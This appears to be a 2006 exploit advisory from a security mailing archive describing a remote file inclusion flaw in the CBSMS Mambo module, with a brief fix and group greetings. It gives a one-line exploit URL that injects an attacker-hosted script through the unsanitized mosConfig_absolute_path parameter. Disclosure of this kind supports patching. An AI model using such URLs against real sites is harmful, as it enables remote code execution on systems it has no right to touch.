--------------------------------------------------------------------------- CBSMS Mambo Module <= 1.0 ([mosConfig_absolute_path]) Remote File Include Vulnerabilities --------------------------------------------------------------------------- Discovered By Kw3[R]Ln [ Romanian Security Team ] Remote : Yes Critical Level : Dangerous --------------------------------------------------------------------------- Affected software description : ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : CBSMS Mambo Module version : latest version [ 1.0 ] URL : http://mamboxchange.com/frs/?group_id=988&release_id=3622 ------------------------------------------------------------------ Exploit: ~~~~~~~~ Variable $mosConfig_absolute_path not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script. # http://www.site.com/[path]/mod_cbsms_messages.php?mosConfig_absolute_path=[evil script] --------------------------------------------------------------------------- Solution : ~~~~~~~~~~ declare variabel $mosConfig_absolute_path --------------------------------------------------------------------------- Shoutz: ~~~~~~ # Special greetz to my good friend [Oo] # To all members of h4cky0u.org ;) and Romanian Security Team [ hTTp://Romania.HackTECK.BE ] --------------------------------------------------------------------------- */ Contact: ~~~~~~~~ Nick: Kw3rLN E-mail: ciriboflacs[at]YaHoo[dot]Com Homepage: hTTp://Romania.HackTECK.BE & http://www.h4cky0u.org/ /* -------------------------------- [ EOF] ---------------------------------- # milw0rm.com [2006-06-26]